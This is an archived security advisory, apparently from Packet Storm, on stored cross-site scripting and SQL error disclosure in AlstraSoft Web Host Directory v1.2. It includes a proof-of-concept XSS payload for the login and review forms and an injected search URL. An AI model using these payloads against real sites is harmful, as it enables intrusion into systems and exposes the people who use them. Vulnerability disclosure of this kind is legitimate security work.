what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebHostDirectoryv1.2.txt

WebHostDirectoryv1.2.txt
Posted May 26, 2006
Authored by Luny

AlstraSoft Web Host Directory v1.2 suffers from XSS.

tags | advisory, web
SHA-256 | 76cb5fead72f07546ff6caac350ef52ff98aa9c400a8460f8a5eaa8319e6951d

WebHostDirectoryv1.2.txt

Change Mirror Download
AlstraSoft Web Host Directory v1.2

Homepage:
http://www.alstrasoft.com/

((It should be noted too that the demo for this script is on a different domain which also sells a WebHost Directory which looks to be the same product/company called HyperStop WebHost Directory 1.2. Both scripts seem to be the same))

Effected files:

Login form of script.
Search form of script.
Review form of script.
------------------------------------------

Exploits & Vulns:

Inserting html codes in the login form such as:

<DIV STYLE="width: expression(alert('XSS'));">

produces the following full path error:

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/username/public_html/

demo/webhost/include/login.php on line 6

---------------------------

URL Injection of the search url reveals SQL Query error:

Example:
http://www.example.com/demo/webhost/search/?uri='

Unknown column 'p.' in 'where clause'
[SELECT COUNT(*) FROM `hsl_plan` p LEFT JOIN `hsl_host` h ON p.hid=h.hid WHERE p.status=1 AND p.``='']

--------------------------

Input data isn't filtered in the write a review box. This in turn can cause a XSS. For proof of concept, just try putting

<DIV STYLE="width: expression(alert('XSS'));"> in as the review text and then login in as the admin and view your review. Reviews have an option to be auto approved too.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close